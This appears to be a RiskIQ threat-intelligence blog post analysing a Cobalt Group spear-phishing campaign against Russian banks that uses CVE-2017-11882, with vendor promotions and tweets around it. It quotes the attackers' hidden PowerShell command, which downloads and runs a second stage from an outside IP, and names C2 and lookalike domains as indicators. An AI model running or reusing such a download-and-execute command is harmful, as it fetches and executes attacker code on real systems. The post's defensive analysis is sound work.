Your organization’s leadership is 12 times more likely to be the target of a security incident and nine times more likely to be the target of a data breach than they were last year. Find out how they can be protected.
Read the Datasheet
Gift Cardsharks: The Massive Threat Campaigns Circling Beneath the Surface
Learn about the attack group primarily targeting gift card retailers and the monetization techniques they use.
Get the Report
Threat Hunting Workshop Series
Join one of our security threat hunting workshops to get hands-on experience investigating and remediating threats.
Attend an Upcoming Workshop
Inside Magecart: New RiskIQ & Flashpoint Research Report
Learn about the groups and criminal underworld behind the front-page breaches.
Threat Hunting Guide: 3 Must-Haves for the Effective Modern Threat Hunter
The threat hunting landscape is constantly evolving. Learn the techniques, tactics, and tools needed to become a highly-effective threat hunter.
Last year November, we documented activities of the Cobalt Group using CVE-2017-11882. In December they were already setting up for their next campaign. Today, on January 16th, the first wave of spear phishing emails were delivered to the inboxes of Russian banks. Sadly, this time around, the group didn’t forget to BCC.
The emails were sent in the name of a large European bank in an attempt to social engineer the receiver into trusting the email. The emails were quite plain with only a single question in the body and an attachment with the name once.rtf. In other cases, we saw a file with the name Заявление.rtf attached to an email that was also written in Russian:
Fig-1 Example of spear phishing email
The emails were sent from addresses on the domains bankosantantder.com and billing-cbr.ru, which were both set up for this campaign specifically.
The attachment abuses CVE-2017-11882 to start PowerShell with the following command:
powershell -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://188.8.131.52:80/a’))”
This command downloads and executes a second stage, which is also a PowerShell script, but encoded:
Fig-2 Second stage
This script decodes to the third stage of the attack, another PowerShell script. This stage-three script is used to load a small piece of embedded shellcode into memory and run it like so:
Fig-3 Stage-three script
The shellcode starts the Cobalt Strike stager in a new threat and starts it up. This stager will initiate connectivity with the C2 server to install the Cobalt Strike implant.
As shown, the stager beacons out to helpdesk-oracle.com, which was registered by a person using the email address firstname.lastname@example.org. This email address pointed us to another domain, which was registered on the same date and follows a similar pattern:
Fig-4 WHOIS information for the malicious email addresses
Right now, the server to which the domain help-desc-me.com points doesn’t seem to be active, nor have we seen any malicious samples connect to it. We have marked it as malicious and listed it in the IOCs below, as we believe it will be part of either a next stage of the attack shown above or used in the next wave of spear phishing emails.
All of the IOCs listed below are also available in the RiskIQ Community Public Project located here: https://community.riskiq.com/projects/f0cd2fc9-a361-2a4c-4489-a21ddf98349b
We have not added the hashes of the staging scripts because they do not appear on the system itself—they live in memory during the initial stages of the attack.
RiskIQ is the leader in attack surface management. We help organizations discover, understand, and mitigate exposures across all digital channels.
Dream situation for adversaries. Holes open daily in the attack surface to support remote work. Time to adapt! Proud to be helping with free access in @PassiveTotal and via the @RiskIQ Illuminate platform. Purpose built for the #CISO and #cybersecurity teams. https://twitter.com/RiskIQ/status/1266444273207083009
Microsoft Remote Desktop is spiking. Why? Because all work is now remote work and all access is now remote access. RiskIQ scans hundreds of ports and maps exposed services to provide security teams with a picture worth a thousand log lines. https://bit.ly/2xJ1Dgx
RiskIQ's #COVID19 Weekly Update:
➡️Car rental company Hertz filed for bankruptcy protection
➡️For the first time, the Boston Marathon has been canceled
➡️Most of the malicious coronavirus emails are coming from US IP space
Read full update here: http://bit.ly/2Uv3CMV
RiskIQ's #COVID19 Internet Intelligence Gateway will enable the cybersecurity community to fight a surge in pandemic-related cybercrime. Sign up, submit any suspicious COVID-19-related URL, and have RiskIQ's powerful global crawling network at your command http://bit.ly/3eon6ek
Via @InfosecurityMag, @DanRaywood highlights RiskIQ's new #COVID19 Internet Intelligence Gateway. This one-stop cybersecurity resource is the latest weapon in the fight against the surge in pandemic-related cybercrime. Read more here https://bit.ly/36ALU02